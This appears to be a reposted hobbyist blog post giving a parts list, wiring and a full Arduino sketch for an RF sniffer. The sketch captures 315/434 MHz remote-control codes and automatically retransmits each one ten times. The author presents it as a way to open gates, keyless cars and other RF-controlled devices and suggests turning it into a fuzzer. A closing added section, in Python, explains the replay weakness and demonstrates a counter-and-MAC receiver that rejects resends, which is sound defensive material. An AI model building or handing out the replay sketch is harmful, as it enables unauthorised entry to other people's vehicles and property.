Nytro

RF Sniffer – open gates, cars, and RF remote controlled devices with ease.


The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.

TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a
for future reference.

The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kinds of RF receivers out there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.

Shopping List

| Amount | Part Type | Properties |
|---|---|---|
| 2 | Inductor | wire antenna |
| 1 | Red LED – 5mm | package 5 mm [THT]; leg yes; color Red (633nm) |
| 1 | Arduino Uno (Rev3) | type Arduino UNO (Rev3) |
| 1 | 315Mhz RF-LINK_RX | package rf-link_rx; part # WRL-10533 |
| 1 | 434Mhz RF-LINK_RX | package rf-link_rx; part # WRL-10532 |
| 1 | 315Mhz RF-LINK_TX | package rf-link_tx; part # WRL-10535 |
| 1 | 434Mhz RF-LINK_TX | package rf-link_tx; part # WRL-10534 |

Scheme

We connect both receivers/transmitters like the following:

[Image: rf_sniffer_bb.png]

Code

And here is the Arduino code. Use at your own risk.

```cpp
/*
 * RF Sniffer © Elia Yehuda 2014
 *
 * This program was coded.
 *
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 *
 */

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();

// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
{
  // print fast to console
  Serial.begin(115200);

  // 315 receiver on interrupt #0 (pin #2)
  rf315Switch.enableReceive(0);
  // 315 transmitter on pin #4
  rf315Switch.enableTransmit(4);
  // how many resends
  rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

  // 434 receiver on interrupt #1 (pin #3)
  rf434Switch.enableReceive(1);
  // 434 transmitter on pin #5
  rf434Switch.enableTransmit(5);
  // how many resends
  rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

  Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
{
  static char b[33];
  b[32] = '\0';

  for ( int z = 0; z < 32; z++) {
    b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
  }

  return b;
}

void process_rf_value(RCSwitch rfswitch, int rf)
{
  char str[120];
  unsigned long value;

  // flash a light to show transmission
  digitalWrite(LED_PIN, true);

  value = rfswitch.getReceivedValue();

  if (value) {
    sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
            rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
  } else {
    sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);
  }

  Serial.println(str);

  // resend the sniffed value (RESEND_SNIFFED_VALUES times)
  rfswitch.send(value, rfswitch.getReceivedBitlength());

  // reset the switch to allow more data to come
  rfswitch.resetAvailable();

  // stop light to show end of transmission
  digitalWrite(LED_PIN, false);
}

void loop()
{
  if (rf315Switch.available()) {
    process_rf_value(rf315Switch, 315);
  }

  if (rf434Switch.available()) {
    process_rf_value(rf434Switch, 434);
  }
}
```

Source: RF Sniffer – open gates, cars, and RF remote controlled devices with ease. | Ziggy's of the world
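Why the resend behaviour in the sketch above works against a fixed-code receiver, and what a receiver-side check that rejects the same resend looks like, as an added example that is not part of the original post or the author's project. The class names, the key, the sample code value and the frame layout (4-byte counter plus 8-byte truncated HMAC-SHA256) are assumptions made for illustration, not any vendor's rolling-code scheme.

```python
import hashlib
import hmac
import struct

class FixedCodeReceiver:
    """Hypothetical receiver that opens on one static code."""
    def __init__(self, code):
        self.code = code

    def accept(self, frame):
        return frame == self.code  # identical bytes always pass, so a resend passes

class CounterMacReceiver:
    """Hypothetical receiver: frame = 4-byte counter || 8-byte truncated HMAC."""
    def __init__(self, key, window=16):
        self.key, self.window, self.last = key, window, 0

    def accept(self, frame):
        if len(frame) != 12:
            return False
        counter = struct.unpack(">I", frame[:4])[0]
        expected = hmac.new(self.key, frame[:4], hashlib.sha256).digest()[:8]
        if not hmac.compare_digest(expected, frame[4:]):
            return False  # forged or corrupted frame
        if not (self.last < counter <= self.last + self.window):
            return False  # already-seen counter (resend) or too far ahead
        self.last = counter
        return True

def remote_frame(key, counter):
    """Frame a legitimate remote would send for a given press counter."""
    c = struct.pack(">I", counter)
    return c + hmac.new(key, c, hashlib.sha256).digest()[:8]

def demo():
    key = b"constructed-demo-key"        # constructed sample key
    code = b"\x00\x51\x45\x03"           # constructed sample fixed code
    fixed, checked = FixedCodeReceiver(code), CounterMacReceiver(key)
    captured = remote_frame(key, 1)      # frame as heard over the air
    return {
        "fixed_first": fixed.accept(code),
        "fixed_resend": fixed.accept(code),
        "mac_first": checked.accept(captured),
        "mac_resend": checked.accept(captured),
        "mac_next_press": checked.accept(remote_frame(key, 2)),
    }

if __name__ == "__main__":
    print(demo())
```

The `window` value bounds how many button presses made out of range the receiver tolerates before the remote has to be resynchronised.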
